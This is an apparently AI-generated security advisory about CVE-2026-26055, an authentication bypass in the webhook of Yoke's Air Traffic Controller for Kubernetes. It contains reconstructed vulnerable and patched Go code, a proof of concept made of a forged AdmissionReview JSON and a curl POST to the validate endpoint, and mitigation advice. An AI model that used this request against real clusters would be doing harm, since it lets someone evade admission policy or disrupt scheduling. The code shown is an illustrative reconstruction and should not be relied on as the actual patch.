CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-26055

Flying Blind: Yoke ATC's Open Door Policy (CVE-2026-26055)

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 13, 2026·6 min read·23 visits

Executive Summary (TL;DR)

Yoke's ATC component doesn't check who is calling its webhook endpoints. Any pod in the cluster can send fake 'AdmissionReview' requests, forcing the controller to execute WASM logic without authorization.

A critical authentication bypass in Yoke's Air Traffic Controller (ATC) component allows unauthenticated network actors to trigger WebAssembly admission logic directly. By failing to validate the identity of the caller (typically the Kubernetes API Server), the ATC exposes its validation and mutation endpoints to the entire cluster network. This allows attackers to bypass admission controls, exhaust resources via WASM execution, or potentially corrupt controller state.

The Hook: Who Watches the Watchmen?

In the Kubernetes ecosystem, Admission Controllers are the bouncers at the club door. Before any Pod, Service, or Ingress gets into the cluster VIP area (etcd), the API Server asks these controllers: 'Is this guy on the list? Is he wearing the right shoes?'

Yoke, a Helm-inspired infrastructure-as-code tool, implements this via its Air Traffic Controller (ATC) component. ATC is cool because it uses WebAssembly (WASM) to run validation logic. Instead of writing rigid Go code, you ship WASM modules that decide if a deployment is valid.

But here is the problem: The bouncer left the velvet rope down. CVE-2026-26055 isn't a complex buffer overflow or a heap grooming masterpiece. It's a fundamental failure to ask 'Who are you?' The ATC component exposes an HTTP server to receive AdmissionReview requests from the Kubernetes API Server, but it forgot to implement the part where it checks if the request actually came from the API Server.

The Flaw: A Promiscuous HTTP Handler

The root cause is a classic CWE-306: Missing Authentication for Critical Function. When you write a Kubernetes Admission Webhook, you are essentially standing up a web server. The Kubernetes API Server acts as the client. To secure this, standard practice dictates two layers of defense:

  1. Mutual TLS (mTLS): The API Server presents a client certificate signed by the cluster CA. The webhook verifies this.
  2. Authentication Tokens: Checking a Bearer token or specific header.

Yoke's ATC implementation skipped this class. It spins up a server and listens. If you send it JSON that looks like an AdmissionReview, it happily deserializes it and hands it off to the WASM runtime.

This means the trust boundary—which should be the encrypted, authenticated channel between the Control Plane and the ATC—is effectively nonexistent. If an attacker has compromised a low-privileged web server in the same cluster (and Network Policies aren't locking things down tight), they can talk directly to the ATC.

The Code: The Smoking Gun

Let's look at a reconstruction of the vulnerable logic flow compared to a secured implementation. The vulnerability lies in the HTTP handler setup in the ATC entry point.

The Vulnerable Code (Conceptual):

// main.go - The "Open Door"
func main() {
    http.HandleFunc("/validate", func(w http.ResponseWriter, r *http.Request) {
        // 1. Read the Body blindly
        body, _ := io.ReadAll(r.Body)
 
        // 2. Unmarshal into AdmissionReview
        var review v1.AdmissionReview
        json.Unmarshal(body, &review)
 
        // 3. EXECUTE WASM LOGIC
        // No check for r.TLS.PeerCertificates
        result := runWasmModule(review)
 
        respond(w, result)
    })
 
    // Starts HTTPS, but doesn't mandate Client Auth
    http.ListenAndServeTLS(":443", "cert.pem", "key.pem", nil)
}

The Fix (Secure Pattern):

To patch this, the developer needs to enforce ClientAuth in the TLS config, ensuring only the Kubernetes API server (which holds the cluster CA signed cert) can connect.

// main.go - The "Bouncer"
func main() {
    caCert, _ := os.ReadFile("/var/run/secrets/kubernetes.io/serviceaccount/ca.crt")
    caCertPool := x509.NewCertPool()
    caCertPool.AppendCertsFromPEM(caCert)
 
    tlsConfig := &tls.Config{
        ClientCAs:  caCertPool,
        // FORCE client certificate verification
        ClientAuth: tls.RequireAndVerifyClientCert,
    }
 
    server := &http.Server{
        Addr:      ":443",
        TLSConfig: tlsConfig,
    }
    
    // Now only the API Server passes the handshake
    server.ListenAndServeTLS("cert.pem", "key.pem")
}

The actual patch in version 0.19.1+ involves wiring up these TLS constraints so that the Go net/http server rejects connections at the handshake level before the application logic even sees the request.

The Exploit: Faking the Funk

Exploiting this is trivially easy if you have a shell inside the cluster. We don't need fancy binaries; curl is enough to trigger the vulnerability.

Step 1: Reconnaissance First, we find the service IP. Since we are inside the cluster, DNS resolves for us.

nslookup yoke-atc.yoke-system.svc.cluster.local
# Address: 10.96.123.45

Step 2: The Payload We construct a fake AdmissionReview. We can put anything in the object field. We could send a massive payload to try and crash the WASM parser, or a specific payload to see how the policy logic reacts.

{
  "kind": "AdmissionReview",
  "apiVersion": "admission.k8s.io/v1",
  "request": {
    "uid": "hacker-uuid-123",
    "kind": {"group": "", "version": "v1", "kind": "Pod"},
    "resource": {"group": "", "version": "v1", "resource": "pods"},
    "operation": "CREATE",
    "userInfo": {
      "username": "system:admin", 
      "groups": ["system:masters"]
    },
    "object": {
      "metadata": {
        "name": "evil-pod"
      },
      "spec": {
        "containers": [{"name": "sh", "image": "alpine"}]
      }
    }
  }
}

Step 3: Triggering the Handler

# -k ignores the self-signed cert on the server side
# We provide NO client cert, yet the server accepts us.
curl -k -X POST \
  https://yoke-atc.yoke-system.svc.cluster.local/validate \
  -H "Content-Type: application/json" \
  -d @payload.json

The Result: The server responds with {"response": {"allowed": true, ...}}. We successfully forced the ATC to process our request. If the WASM module had a vulnerability (e.g., a parser crash or infinite loop), we just DoS'd the cluster's admission control mechanism.

The Impact: Why Should We Care?

You might ask, "So what? It's just validation logic." The impact here is subtle but dangerous.

1. Denial of Service (Compute Exhaustion): WASM is fast, but it's not magic. If an attacker floods the /validate endpoint with complex requests, they consume CPU and memory on the ATC pods. If the ATC goes down or becomes unresponsive, and the ValidatingWebhookConfiguration has failurePolicy: Fail (which is secure default), no new pods can be scheduled in the cluster. The attacker effectively freezes the cluster's ability to scale or self-heal.

2. Logic Probing: An attacker can use this to reverse-engineer your security policies. By sending thousands of variations of a Pod spec, they can determine exactly what is allowed and what isn't, without creating noisy audit logs in the Kubernetes API server. They are fuzzing your policies offline.

3. Side-Channel Attacks: If the WASM modules reach out to external services (e.g., checking an image signature against a database) based on the input, an attacker can trigger Server-Side Request Forgery (SSRF) via the ATC pod.

The Fix: Closing the Door

The remediation is straightforward but urgent.

1. Upgrade Yoke: Move to version 0.19.1 or 0.20.0 immediately. The maintainers have added the necessary TLS client verification flags.

2. Defense in Depth (Network Policies): This vulnerability highlights why you cannot rely on application-layer auth alone. You must implement Kubernetes NetworkPolicies.

kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: deny-all-ingress-except-api
  namespace: yoke-system
spec:
  podSelector:
    matchLabels:
      app: yoke-atc
  ingress:
    - from:
      # Allow Control Plane / API Server
      # (CIDR depends on your specific cloud/cluster config)
      - ipBlock:
          cidr: 10.0.0.1/32 

If a Network Policy had been in place restricting traffic to port 443 on the ATC pods, this vulnerability would be unexploitable from a compromised pod in a different namespace, regardless of the code flaw.

Official Patches

GitHubOfficial Security Advisory

Fix Analysis (1)

Technical Appendix

CVSS Score
7.5/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Affected Systems

Yoke Air Traffic Controller (ATC)Kubernetes Clusters using Yoke < 0.19.1

Affected Versions Detail

Product
Affected Versions
Fixed Version
Yoke (ATC)
yokecd
<= 0.19.00.19.1
AttributeDetail
CWECWE-306 (Missing Authentication)
CVSS v3.17.5 (High)
Attack VectorNetwork (Internal K8s)
Privileges RequiredNone
ImpactIntegrity / Denial of Service
Exploit StatusPoC / Functional

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1556Modify Authentication Process
Credential Access
CWE-306
Missing Authentication for Critical Function

The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.

Known Exploits & Detection

Internal ResearchThe advisory describes the lack of authentication which implicitly allows curl-based exploitation.
NucleiDetection Template Available

Vulnerability Timeline

CVE Published
2026-02-12
Patch Released (v0.20.0)
2026-02-12
OSV Entry Updated
2026-02-13

References & Sources

  • [1]GHSA-965m-v4cc-6334
  • [2]NVD - CVE-2026-26055

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 4 hours ago•GHSA-VJC7-JRH9-9J86
10.0

Unauthenticated CRUD and Sensitive Data Exposure in 9Router API Endpoints

An access control deficiency in the 9Router dashboard allows unauthenticated remote attackers to perform full CRUD operations on integrated AI providers, extract plaintext API keys, and access complete system conversation histories.

Amit Schendel
Amit Schendel
6 views•5 min read
•about 5 hours ago•CVE-2026-55790
7.4

CVE-2026-55790: DOM-Based Cross-Site Scripting in Craft CMS Support Widget

A DOM-based cross-site scripting (XSS) vulnerability exists in Craft CMS versions 4.0.0-RC1 through 4.17.15 and 5.0.0-RC1 through 5.9.22. The flaw resides within the CraftSupport widget's feedback search component, which fails to neutralize GitHub issue titles before rendering them into the administrator's control panel. An unauthenticated attacker can exploit this vulnerability by submitting a crafted issue to the public Craft CMS repository on GitHub.

Alon Barad
Alon Barad
6 views•7 min read
•about 5 hours ago•CVE-2026-55793
5.9

CVE-2026-55793: Stored DOM-Based Cross-Site Scripting in Craft CMS ElementTableSorter

CVE-2026-55793 is a DOM-based Stored Cross-Site Scripting (XSS) vulnerability affecting Craft CMS versions 5.0.0-RC1 through 5.9.22. An authenticated user with minimum Author privileges can store a malicious payload in an entry's title. When an administrator or high-privileged user performs a drag-and-drop operation under the modified entry in the structure table view, the unescaped payload is retrieved and concatenated into raw HTML, resulting in arbitrary JavaScript execution within the context of the administrative session.

Alon Barad
Alon Barad
5 views•8 min read
•about 6 hours ago•CVE-2026-55794
8.7

CVE-2026-55794: Authenticated Remote Code Execution via Template Injection in Craft CMS

Craft CMS versions 5.9.0 through 5.9.9 are vulnerable to authenticated Remote Code Execution (RCE). An attacker with control panel permissions to edit entries can inject malicious Twig templates into the client-side HTTP Referer header. During the post-save redirect sequence, the server evaluates this user-controlled header using an unsandboxed Twig rendering function, leading to arbitrary system command execution.

Amit Schendel
Amit Schendel
5 views•6 min read
•about 6 hours ago•GHSA-CGFV-JRFP-2R7V
8.5

GHSA-cgfv-jrfp-2r7v: Authenticated SQL Injection in OpenRemote Datapoint Crosstab Export

An authenticated SQL injection vulnerability exists in the datapoint crosstab export functionality of OpenRemote. The vulnerability is caused by insecure manual SQL string construction that concatenates user-controlled display data, specifically asset display names and attribute names, directly into raw SQL statements. These statements are processed by the PostgreSQL database engine using the crosstab function to structure dynamic CSV outputs.

Amit Schendel
Amit Schendel
4 views•5 min read
•about 7 hours ago•GHSA-QRWJ-VH9X-GW5V
8.0

GHSA-QRWJ-VH9X-GW5V: Cross-Agent Server-Side Request Forgery and Remote Code Execution in Coder Workspace Agent

An insecure redirect vulnerability in Coder allows an authenticated attacker who controls a workspace agent to perform unauthorized cross-agent file operations and achieve remote code execution in other workspaces. By exploiting default redirect-following behavior in the control-plane's HTTP client, a malicious agent can redirect legitimate requests to a victim's deterministic tailnet IP address.

Amit Schendel
Amit Schendel
5 views•5 min read